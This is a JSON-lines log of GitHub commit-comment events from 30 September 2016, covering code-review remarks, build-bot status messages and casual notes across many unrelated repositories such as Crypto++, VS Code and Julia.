{"id":"4641455604","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19236255,"position":null,"line":null,"path":null,"commit_id":"11fc3df369d572093d1782f5edc1f8fb8c55117e","created_at":"2016-09-30T04:56:58Z","updated_at":"2016-09-30T04:56:58Z","body":"Also see [Issue 312: Coverity finding CID 148134, 148138: Uninitialized scalar field (UNINIT_CTOR)](https://github.com/weidai11/cryptopp/issues/312)."}},"created_at":"2016-09-30T04:56:58Z"}
{"id":"4641455926","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19236258,"position":null,"line":null,"path":null,"commit_id":"5a0a2187f2e369868de7dfcac71e206e1b42a60b","created_at":"2016-09-30T04:57:07Z","updated_at":"2016-09-30T04:57:07Z","body":"Also see [Issue 312: Coverity finding CID 148134, 148138: Uninitialized scalar field (UNINIT_CTOR)](https://github.com/weidai11/cryptopp/issues/312)."}},"created_at":"2016-09-30T04:57:07Z"}
{"id":"4641460013","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19236263,"position":18,"line":137,"path":"src/vs/workbench/services/configurationResolver/node/configurationResolverService.ts","commit_id":"0bd444927df913815e9dbf03c6be52532e53d840","created_at":"2016-09-30T04:59:03Z","updated_at":"2016-09-30T04:59:03Z","body":"@chrmarti isn't this code doing what /Users/bpasero/Development/Microsoft/monaco/src/vs/platform/configuration/common/configuration.ts is already doing without having to introduce a new NPM dependency so late?"}},"created_at":"2016-09-30T04:59:03Z"}
{"id":"4641468624","type":"CommitCommentEvent","actor":{"login":"bittelc"},"repo":{"name":"jreut/thebrokendialogue"},"payload":{"comment":{"id":19236276,"position":null,"line":null,"path":null,"commit_id":"4c8d8b0ec4b33dd794514bd0ba29f78c8fbf0340","created_at":"2016-09-30T05:02:47Z","updated_at":"2016-09-30T05:02:47Z","body":"This good.\r\nAll make harpy."}},"created_at":"2016-09-30T05:02:47Z"}
{"id":"4641472352","type":"CommitCommentEvent","actor":{"login":"night"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19236283,"position":4,"line":537,"path":"src/css/betterttv-dark.css","commit_id":"0dc389462ba4bd579d9aa4c91403c6673300e90a","created_at":"2016-09-30T05:04:29Z","updated_at":"2016-09-30T05:04:29Z","body":"test"}},"created_at":"2016-09-30T05:04:29Z"}
{"id":"4641472985","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19236285,"position":null,"line":null,"path":null,"commit_id":"9332998dcf6812c5e635fe3ed7570328b0353361","created_at":"2016-09-30T05:04:49Z","updated_at":"2016-09-30T05:04:49Z","body":"I know that **hastype** has a bad rep, but is **hastype(e,t)** actually any different than **not indets(e,t) = {}**?"}},"created_at":"2016-09-30T05:04:49Z"}
{"id":"4641474557","type":"CommitCommentEvent","actor":{"login":"romanlukichev"},"repo":{"name":"romanlukichev/parsentev_course_test"},"payload":{"comment":{"id":19236296,"position":null,"line":null,"path":null,"commit_id":"10322c63a5ff580fb7459f7e8d3c5b88cae64e25","created_at":"2016-09-30T05:05:28Z","updated_at":"2016-09-30T05:05:28Z","body":"Suscessfully done tehe first three tasks.\r\nhttps://www.youtube.com/watch?v=l8M1gmsZxSU\r\nFree course from russian developer and teacher Peter Arsetijev - \"Java Maven TDD JUnit IDEA Git\""}},"created_at":"2016-09-30T05:05:28Z"}
{"id":"4641477400","type":"CommitCommentEvent","actor":{"login":"gizmo110"},"repo":{"name":"abarth/http-state"},"payload":{"comment":{"id":19236303,"position":221,"line":221,"path":"rfc/rfc2109.xml","commit_id":"3ce8a61cd29ac29b84552ddfa5843941774c543c","created_at":"2016-09-30T05:06:49Z","updated_at":"2016-09-30T05:06:49Z","body":"- _"}},"created_at":"2016-09-30T05:06:49Z"}
{"id":"4641481240","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19236314,"position":15,"line":0,"path":"sources/match.c","commit_id":"3edf9c4d1bfec5edf3d9383cdcceaf76f976d34d","created_at":"2016-09-30T05:08:41Z","updated_at":"2016-09-30T05:08:41Z","body":"Use a stack or tail recursion?"}},"created_at":"2016-09-30T05:08:41Z"}
{"id":"4641482038","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19236316,"position":16,"line":0,"path":"sources/main.c","commit_id":"f492effe91d2dc30b54d4aef5cda425f77ebbaa8","created_at":"2016-09-30T05:09:04Z","updated_at":"2016-09-30T05:09:04Z","body":"LOL"}},"created_at":"2016-09-30T05:09:04Z"}
{"id":"4641486132","type":"CommitCommentEvent","actor":{"login":"chrmarti"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19236329,"position":18,"line":137,"path":"src/vs/workbench/services/configurationResolver/node/configurationResolverService.ts","commit_id":"0bd444927df913815e9dbf03c6be52532e53d840","created_at":"2016-09-30T05:11:01Z","updated_at":"2016-09-30T05:11:01Z","body":"@bpasero We also support array access and (somewhat by chance) bracket notation: `${config.some['thing']}`, `${config.someArray[0]}`"}},"created_at":"2016-09-30T05:11:01Z"}
{"id":"4641488646","type":"CommitCommentEvent","actor":{"login":"Kalman98"},"repo":{"name":"TEAMModding/KalStuff"},"payload":{"comment":{"id":19236332,"position":null,"line":null,"path":null,"commit_id":"5430cf29d5393e62b7636dd659041498229f2588","created_at":"2016-09-30T05:12:13Z","updated_at":"2016-09-30T05:12:13Z","body":"@ParkerMc does this work?"}},"created_at":"2016-09-30T05:12:13Z"}
{"id":"4641490291","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19236337,"position":null,"line":null,"path":null,"commit_id":"b36141f4799d73113b3597ee94d5925929b2ccd5","created_at":"2016-09-30T05:13:00Z","updated_at":"2016-09-30T05:13:00Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/b36141f4799d73113b3597ee94d5925929b2ccd5#commitcomment-19235956) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/13d95f0357462fa011c9cb35a9709b9ac5a8478a/daily_2016_9_30/report.md). cc @jrevels"}},"created_at":"2016-09-30T05:13:00Z"}
{"id":"4641491656","type":"CommitCommentEvent","actor":{"login":"leegive"},"repo":{"name":"leegive/test"},"payload":{"comment":{"id":19236342,"position":null,"line":null,"path":null,"commit_id":"5dc34993433ae7f66b96a54445fb33fd1ba7640b","created_at":"2016-09-30T05:13:41Z","updated_at":"2016-09-30T05:13:41Z","body":"ok"}},"created_at":"2016-09-30T05:13:41Z"}
{"id":"4641492587","type":"CommitCommentEvent","actor":{"login":"monk8800"},"repo":{"name":"edwardhotchkiss/mongoose-paginate"},"payload":{"comment":{"id":19236343,"position":null,"line":null,"path":null,"commit_id":"402ad10916b82b858355f197173810027be7396a","created_at":"2016-09-30T05:14:08Z","updated_at":"2016-09-30T05:14:08Z","body":"Any reason for the version change without any changes? or may i not seeing something. "}},"created_at":"2016-09-30T05:14:08Z"}
{"id":"4641494528","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19236346,"position":null,"line":null,"path":null,"commit_id":"e965863f4bf95041f60d207d606d2dc621a9e0fa","created_at":"2016-09-30T05:15:04Z","updated_at":"2016-09-30T05:15:04Z","body":"buildingunit (nmerket) - Win64-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e965863f4bf95041f60d207d606d2dc621a9e0fa-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-20.11%25-red.svg)</a> \n"}},"created_at":"2016-09-30T05:15:04Z"}
{"id":"4641494654","type":"CommitCommentEvent","actor":{"login":"usnaked"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19236348,"position":15,"line":19,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-30T05:15:08Z","updated_at":"2016-09-30T05:15:08Z","body":"Забыл вынести =\\"}},"created_at":"2016-09-30T05:15:08Z"}
{"id":"4641496440","type":"CommitCommentEvent","actor":{"login":"usnaked"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19236352,"position":21,"line":23,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-30T05:15:56Z","updated_at":"2016-09-30T05:15:56Z","body":"Да-да, я знал, когда пушил"}},"created_at":"2016-09-30T05:15:56Z"}
{"id":"4641502577","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19236366,"position":null,"line":null,"path":null,"commit_id":"975bc2c4d7cd586f97b1ae4861a8d49750739a1e","created_at":"2016-09-30T05:18:46Z","updated_at":"2016-09-30T05:18:46Z","body":"This is my first branch."}},"created_at":"2016-09-30T05:18:46Z"}
{"id":"4641504299","type":"CommitCommentEvent","actor":{"login":"usnaked"},"repo":{"name":"usnaked/tutorial"},"payload":{"comment":{"id":19236372,"position":26,"line":28,"path":"src/main/java/Sorting.java","commit_id":"90cd3be680af446dcb198d617b6b08adbfd25d2f","created_at":"2016-09-30T05:19:32Z","updated_at":"2016-09-30T05:19:32Z","body":"Да подумал, что ф-ю можно сразу для 2-х направлений написать, но что-то не успел."}},"created_at":"2016-09-30T05:19:32Z"}
{"id":"4641504417","type":"CommitCommentEvent","actor":{"login":"kazekage605"},"repo":{"name":"kazekage605/kazekage605"},"payload":{"comment":{"id":19236374,"position":null,"line":null,"path":null,"commit_id":"19c9f89ab2a854004aca5e5e7185875c6b2b08be","created_at":"2016-09-30T05:19:35Z","updated_at":"2016-09-30T05:19:35Z","body":"Welcome!"}},"created_at":"2016-09-30T05:19:35Z"}
{"id":"4641510378","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":19236391,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-30T05:22:16Z","updated_at":"2016-09-30T05:22:16Z","body":"можеш спросить у того кто разбирается в этом? я думаю что нет смысла делать фэйковый hdr"}},"created_at":"2016-09-30T05:22:16Z"}
{"id":"4641515593","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"kevva/github-branches-cli"},"payload":{"comment":{"id":19236404,"position":12,"line":12,"path":"cli.js","commit_id":"682a48bac442a3971605b8e3087911e860756b3c","created_at":"2016-09-30T05:24:37Z","updated_at":"2016-09-30T05:24:37Z","body":"toke => token"}},"created_at":"2016-09-30T05:24:37Z"}
{"id":"4641516031","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"kevva/github-branches-cli"},"payload":{"comment":{"id":19236405,"position":9,"line":9,"path":"cli.js","commit_id":"682a48bac442a3971605b8e3087911e860756b3c","created_at":"2016-09-30T05:24:49Z","updated_at":"2016-09-30T05:24:49Z","body":"`--token 523ef69119eadg12` => `--token=523ef69119eadg12`"}},"created_at":"2016-09-30T05:24:49Z"}
{"id":"4641516724","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"kevva/github-branches-cli"},"payload":{"comment":{"id":19236407,"position":19,"line":19,"path":"cli.js","commit_id":"682a48bac442a3971605b8e3087911e860756b3c","created_at":"2016-09-30T05:25:08Z","updated_at":"2016-09-30T05:25:08Z","body":"> Specify a repository\r\n\r\n?"}},"created_at":"2016-09-30T05:25:08Z"}
{"id":"4641518513","type":"CommitCommentEvent","actor":{"login":"jessicachoy"},"repo":{"name":"jessicachoy/testing"},"payload":{"comment":{"id":19236410,"position":4,"line":2,"path":"intro","commit_id":"a1aaf7b3fc2453755acfd592ff6d254438c5aaa2","created_at":"2016-09-30T05:25:56Z","updated_at":"2016-09-30T05:25:56Z","body":"another note"}},"created_at":"2016-09-30T05:25:56Z"}
{"id":"4641522918","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"kevva/github-branches-cli"},"payload":{"comment":{"id":19236417,"position":10,"line":10,"path":"test.js","commit_id":"682a48bac442a3971605b8e3087911e860756b3c","created_at":"2016-09-30T05:27:44Z","updated_at":"2016-09-30T05:27:44Z","body":"Why are these tested? They're already tested by `meow`. I don't see the point in repeating these in every CLI."}},"created_at":"2016-09-30T05:27:44Z"}
{"id":"4641527740","type":"CommitCommentEvent","actor":{"login":"yonvaida"},"repo":{"name":"yonvaida/Probleme"},"payload":{"comment":{"id":19236425,"position":null,"line":null,"path":null,"commit_id":"694d6a826d007fb2792aa9e7b9cf2805196e2735","created_at":"2016-09-30T05:29:49Z","updated_at":"2016-09-30T05:29:49Z","body":"redme"}},"created_at":"2016-09-30T05:29:49Z"}
{"id":"4641529989","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19236427,"position":null,"line":null,"path":null,"commit_id":"243bd5313e97f75fc878314c2cc1b2b11b2a0677","created_at":"2016-09-30T05:30:44Z","updated_at":"2016-09-30T05:30:44Z","body":"MakeWebKitWork (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T05:30:44Z"}
{"id":"4641531011","type":"CommitCommentEvent","actor":{"login":"rahulpandeygwl"},"repo":{"name":"yogitado/project_Ecomm"},"payload":{"comment":{"id":19236429,"position":null,"line":null,"path":null,"commit_id":"17d9069714261c1d132e49684571aa9c75be4d1a","created_at":"2016-09-30T05:31:12Z","updated_at":"2016-09-30T05:31:12Z","body":"MYP-1"}},"created_at":"2016-09-30T05:31:12Z"}
{"id":"4641535477","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19236445,"position":null,"line":null,"path":null,"commit_id":"243bd5313e97f75fc878314c2cc1b2b11b2a0677","created_at":"2016-09-30T05:33:13Z","updated_at":"2016-09-30T05:33:13Z","body":"MakeWebKitWork (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T05:33:13Z"}
{"id":"4641535552","type":"CommitCommentEvent","actor":{"login":"PawlakArtur"},"repo":{"name":"PawlakArtur/CurriculumVitae"},"payload":{"comment":{"id":19236446,"position":12,"line":56,"path":"app/index.html","commit_id":"8b57f7dd37a3dbf1ba9199aecf15a2226ddf053f","created_at":"2016-09-30T05:33:15Z","updated_at":"2016-09-30T05:33:15Z","body":"Na razie tak się go powoli uczę, jak coś tam zrobię to pokażę ;)"}},"created_at":"2016-09-30T05:33:15Z"}
{"id":"4641537210","type":"CommitCommentEvent","actor":{"login":"macgyver88chan"},"repo":{"name":"e0a06fd/automatic-dollop"},"payload":{"comment":{"id":19236451,"position":null,"line":null,"path":null,"commit_id":"21997ef9908227e665cb8055751355f8810f337c","created_at":"2016-09-30T05:34:01Z","updated_at":"2016-09-30T05:34:01Z","body":"0 parents commit 21997ef9908227e665cb8055751355f8810f337c  macgyver88chan committed Sep 30, 2016 sorry i really not understand ?"}},"created_at":"2016-09-30T05:34:01Z"}
{"id":"4641537745","type":"CommitCommentEvent","actor":{"login":"hypergravity"},"repo":{"name":"annayqho/TheCannon"},"payload":{"comment":{"id":19236455,"position":47,"line":63,"path":"TheCannon/train_model.py","commit_id":"dad45dcf60717f7fce402d07887ef3090beeb123","created_at":"2016-09-30T05:34:14Z","updated_at":"2016-09-30T05:34:14Z","body":"Have you tested the run_apogee_example.py after you add this *wl_filter*?\r\nI was told that it seems that this parameter causes an error during running run_apogee_example.py.\r\nNot sure whether there is a bug here..."}},"created_at":"2016-09-30T05:34:14Z"}
{"id":"4641538547","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19236458,"position":17,"line":0,"path":"sources/match.c","commit_id":"3edf9c4d1bfec5edf3d9383cdcceaf76f976d34d","created_at":"2016-09-30T05:34:35Z","updated_at":"2016-09-30T05:34:35Z","body":"IIRC, null-terminated strings don't wish so well with Unicode strings, so might be careful about infinite recursion lel"}},"created_at":"2016-09-30T05:34:35Z"}
{"id":"4641540658","type":"CommitCommentEvent","actor":{"login":"NuclearCoder"},"repo":{"name":"Seluj78/General-C-Compiler"},"payload":{"comment":{"id":19236467,"position":12,"line":0,"path":"sources/main.c","commit_id":"f492effe91d2dc30b54d4aef5cda425f77ebbaa8","created_at":"2016-09-30T05:35:31Z","updated_at":"2016-09-30T05:35:31Z","body":"What is that syntax? I've never seen that before :o"}},"created_at":"2016-09-30T05:35:31Z"}
{"id":"4641544307","type":"CommitCommentEvent","actor":{"login":"vaibhav1"},"repo":{"name":"vaibhav1/DesignPatterns"},"payload":{"comment":{"id":19236483,"position":null,"line":null,"path":null,"commit_id":"b1ca639b4911cec458f7b03b35c9992882b52b4e","created_at":"2016-09-30T05:37:07Z","updated_at":"2016-09-30T05:37:07Z","body":"random."}},"created_at":"2016-09-30T05:37:07Z"}
{"id":"4641547039","type":"CommitCommentEvent","actor":{"login":"vieiralucas"},"repo":{"name":"lucasfcosta/dotfiles"},"payload":{"comment":{"id":19236498,"position":null,"line":null,"path":null,"commit_id":"348511618c80c897b102a775816f7e78bbdf229b","created_at":"2016-09-30T05:38:21Z","updated_at":"2016-09-30T05:38:21Z","body":"lol"}},"created_at":"2016-09-30T05:38:21Z"}
{"id":"4641547669","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19236500,"position":null,"line":null,"path":null,"commit_id":"53d1842b2c2c652522a63befb54bf8ee8965a85c","created_at":"2016-09-30T05:38:38Z","updated_at":"2016-09-30T05:38:38Z","body":"Ah.. should have read the commits :x: \r\n\r\nOk uncommenting and booting on the desky then creating an USB for the Iconia... # sanity check"}},"created_at":"2016-09-30T05:38:38Z"}
{"id":"4641547734","type":"CommitCommentEvent","actor":{"login":"igneus"},"repo":{"name":"rsterbin/liturgicalendar"},"payload":{"comment":{"id":19236503,"position":6,"line":11,"path":"database/migrations/20160810135105_stmarys_moveable_feasts.sql","commit_id":"234a963263af534ff5d31c3c2ebea7af782753c5","created_at":"2016-09-30T05:38:41Z","updated_at":"2016-09-30T05:38:41Z","body":"Just saying: In the Roman Catholic church, at least on the global level, gold isn't a liturgical colour on it's own and the ordinary colour of the Easter Day is white. Gold is just an option for more solemn feasts. See GIRM 346, e.g. [here](http://www.usccb.org/prayer-and-worship/the-mass/general-instruction-of-the-roman-missal/girm-chapter-6.cfm)"}},"created_at":"2016-09-30T05:38:41Z"}
{"id":"4641548930","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19236506,"position":3,"line":3,"path":"README.md","commit_id":"9318b9374d8b4f1a64fbaff6f8288c52ed0c62ad","created_at":"2016-09-30T05:39:14Z","updated_at":"2016-09-30T05:39:14Z","body":"This is my first branch."}},"created_at":"2016-09-30T05:39:14Z"}
{"id":"4641549736","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19236510,"position":1,"line":1,"path":"README.md","commit_id":"9318b9374d8b4f1a64fbaff6f8288c52ed0c62ad","created_at":"2016-09-30T05:39:34Z","updated_at":"2016-09-30T05:39:34Z","body":"This is my first branch."}},"created_at":"2016-09-30T05:39:34Z"}
{"id":"4641551266","type":"CommitCommentEvent","actor":{"login":"recca0120"},"repo":{"name":"goez-tools/laravel-tracy"},"payload":{"comment":{"id":19236512,"position":null,"line":null,"path":null,"commit_id":"d40051db223f43f0c35c9f9623fe945ff303b256","created_at":"2016-09-30T05:40:14Z","updated_at":"2016-09-30T05:40:14Z","body":"Hi 鐵哥...\r\n\r\n討論一下\r\n這個問題當時在寫的時候有考慮到\r\nLaravel有Middleware來進行session_close的動作\r\n\r\n那在什麼情境之下會發生問題？\r\n\r\n另外我認為應該要把session_write_close的功能關掉\r\n原因是....如果我們使用第三方package\r\n一樣也用到session，結果第三方package也執行了session_write_closre\r\n\r\n有可能會造成Laravel出錯....\r\n不知道是不是考慮太多  XDD\r\n\r\n"}},"created_at":"2016-09-30T05:40:14Z"}
{"id":"4641552474","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19236514,"position":108,"line":987,"path":"okhttp/src/main/java/io/grpc/okhttp/OkHttpClientTransport.java","commit_id":"93e090492fa12dfa8d2a67511862fb4ccccbe4d7","created_at":"2016-09-30T05:40:48Z","updated_at":"2016-09-30T05:40:48Z","body":"Preconditions"}},"created_at":"2016-09-30T05:40:48Z"}
{"id":"4641554234","type":"CommitCommentEvent","actor":{"login":"danmar"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19236517,"position":18,"line":1444,"path":"lib/tokenize.cpp","commit_id":"659263802205de68eee3b987d9a5710faa337e38","created_at":"2016-09-30T05:41:35Z","updated_at":"2016-09-30T05:41:35Z","body":"I don't think we should silence this FP with initialization. Somebody should report upstream about this FP."}},"created_at":"2016-09-30T05:41:35Z"}
{"id":"4641554466","type":"CommitCommentEvent","actor":{"login":"themattchan"},"repo":{"name":"ucsd-progsys/131-web"},"payload":{"comment":{"id":19236520,"position":248,"line":248,"path":"lectures/03-adder.md","commit_id":"e9aa79caeaacf21c71ebb1bd8aed2425854cc505","created_at":"2016-09-30T05:41:41Z","updated_at":"2016-09-30T05:41:41Z","body":"Why not `asm = L.intercalate \"\\n\" . map instr` ?"}},"created_at":"2016-09-30T05:41:41Z"}
{"id":"4641558048","type":"CommitCommentEvent","actor":{"login":"joe-Wu"},"repo":{"name":"joe-Wu/hello-world"},"payload":{"comment":{"id":19236524,"position":3,"line":3,"path":"helloworld.php","commit_id":"0f76b58c330e339d928bcb90871a30e555423ab2","created_at":"2016-09-30T05:43:13Z","updated_at":"2016-09-30T05:43:13Z","body":"echo 'Hello World!2';\r\n?>"}},"created_at":"2016-09-30T05:43:13Z"}
{"id":"4641558841","type":"CommitCommentEvent","actor":{"login":"rahulpandeygwl"},"repo":{"name":"yogitado/project_Ecomm"},"payload":{"comment":{"id":19236525,"position":null,"line":null,"path":null,"commit_id":"1005e23f7271e29e537abc97124536452348b67e","created_at":"2016-09-30T05:43:32Z","updated_at":"2016-09-30T05:43:32Z","body":"MYP-1"}},"created_at":"2016-09-30T05:43:32Z"}
{"id":"4641561230","type":"CommitCommentEvent","actor":{"login":"jwvg0425"},"repo":{"name":"pjc0247/Unity.CLog"},"payload":{"comment":{"id":19236529,"position":null,"line":null,"path":null,"commit_id":"e6781f5d1a6deec180ed5ae6c8bb9c984ab80d69","created_at":"2016-09-30T05:44:28Z","updated_at":"2016-09-30T05:44:28Z","body":"미쳤다 진짜;;"}},"created_at":"2016-09-30T05:44:28Z"}
{"id":"4641565355","type":"CommitCommentEvent","actor":{"login":"themattchan"},"repo":{"name":"ucsd-progsys/131-web"},"payload":{"comment":{"id":19236539,"position":548,"line":548,"path":"lectures/03-adder.md","commit_id":"e9aa79caeaacf21c71ebb1bd8aed2425854cc505","created_at":"2016-09-30T05:46:06Z","updated_at":"2016-09-30T05:46:06Z","body":"No commas in `let` bindings"}},"created_at":"2016-09-30T05:46:06Z"}
{"id":"4641566840","type":"CommitCommentEvent","actor":{"login":"watchlondon"},"repo":{"name":"WordPress/theme-check"},"payload":{"comment":{"id":19236542,"position":5,"line":8,"path":"theme-check.php","commit_id":"406b26f405527e7afd6733e1b4581aa2941029c6","created_at":"2016-09-30T05:46:38Z","updated_at":"2016-09-30T05:46:38Z","body":"20160523.1"}},"created_at":"2016-09-30T05:46:38Z"}
{"id":"4641567679","type":"CommitCommentEvent","actor":{"login":"vinothkumarrepo"},"repo":{"name":"Deemsys43230/CHP_Web_V1.0_Front"},"payload":{"comment":{"id":19236545,"position":null,"line":null,"path":null,"commit_id":"ccec9e7c788552e1b716318a76276746f850ce66","created_at":"2016-09-30T05:46:57Z","updated_at":"2016-09-30T05:46:57Z","body":"[30sept2016.txt](https://github.com/Deemsys43230/CHP_Web_V1.0_Front/files/502203/30sept2016.txt)\r\n"}},"created_at":"2016-09-30T05:46:57Z"}
{"id":"4641567991","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19236546,"position":null,"line":null,"path":null,"commit_id":"d14da994942a6fe497a6b510aa1996bf7525d211","created_at":"2016-09-30T05:47:02Z","updated_at":"2016-09-30T05:47:02Z","body":"https://github.com/pugjs/pug/issues/2305"}},"created_at":"2016-09-30T05:47:02Z"}
{"id":"4641568482","type":"CommitCommentEvent","actor":{"login":"watchlondon"},"repo":{"name":"WordPress/theme-check"},"payload":{"comment":{"id":19236547,"position":4,"line":8,"path":"theme-check.php","commit_id":"406b26f405527e7afd6733e1b4581aa2941029c6","created_at":"2016-09-30T05:47:14Z","updated_at":"2016-09-30T05:47:14Z","body":"20160523.1"}},"created_at":"2016-09-30T05:47:14Z"}
{"id":"4641577916","type":"CommitCommentEvent","actor":{"login":"harikrishna99"},"repo":{"name":"sailajavijay/team"},"payload":{"comment":{"id":19236561,"position":null,"line":null,"path":null,"commit_id":"e47c9b97f1d91ad91bdd7a1bf4cb8850c02b9343","created_at":"2016-09-30T05:50:50Z","updated_at":"2016-09-30T05:50:50Z","body":"change is happen"}},"created_at":"2016-09-30T05:50:50Z"}
{"id":"4641580399","type":"CommitCommentEvent","actor":{"login":"zyxue"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19236572,"position":10,"line":8,"path":"charData/convert_to_json.py","commit_id":"e6fadba7136c5dba2fd4e21086aae16192768561","created_at":"2016-09-30T05:51:51Z","updated_at":"2016-09-30T05:51:51Z","body":"I like the use of codecs. Will it be still necessary if it's Python3?"}},"created_at":"2016-09-30T05:51:51Z"}
{"id":"4641581747","type":"CommitCommentEvent","actor":{"login":"bradleysepos"},"repo":{"name":"HandBrake/HandBrake"},"payload":{"comment":{"id":19236576,"position":null,"line":null,"path":null,"commit_id":"d3985316111dc8c995bd1e2fe6dcfc700ea30d0b","created_at":"2016-09-30T05:52:25Z","updated_at":"2016-09-30T05:52:25Z","body":"With this commit:\r\n\r\n```\r\nx265 [info]: HEVC encoder version 0.0\r\n```\r\n\r\nPreviously:\r\n\r\n```\r\nx265 [info]: HEVC encoder version 2.0\r\n```"}},"created_at":"2016-09-30T05:52:25Z"}
{"id":"4641581766","type":"CommitCommentEvent","actor":{"login":"harikrishna99"},"repo":{"name":"sailajavijay/team"},"payload":{"comment":{"id":19236577,"position":2,"line":1,"path":"change","commit_id":"6bcb37a41b74c4e3ecde29d6d74ffa72e4db791f","created_at":"2016-09-30T05:52:26Z","updated_at":"2016-09-30T05:52:26Z","body":"change"}},"created_at":"2016-09-30T05:52:26Z"}
{"id":"4641584004","type":"CommitCommentEvent","actor":{"login":"JanMarvin"},"repo":{"name":"sjewo/readstata13"},"payload":{"comment":{"id":19236580,"position":null,"line":null,"path":null,"commit_id":"a59842ec105d36e9324a2db1ade11f9538564979","created_at":"2016-09-30T05:53:20Z","updated_at":"2016-09-30T05:53:20Z","body":"This should be tested thoroughly."}},"created_at":"2016-09-30T05:53:20Z"}
{"id":"4641585729","type":"CommitCommentEvent","actor":{"login":"dcousens"},"repo":{"name":"dcousens/typeforce"},"payload":{"comment":{"id":19236582,"position":27,"line":37,"path":"index.js","commit_id":"c952ca5e2f20beb6c19a916cf26ad85ba0d16d71","created_at":"2016-09-30T05:54:04Z","updated_at":"2016-09-30T05:54:04Z","body":"this line is the defining difference, before if type was falsy, `''` would be chosen, now it is only if it is undefined"}},"created_at":"2016-09-30T05:54:04Z"}
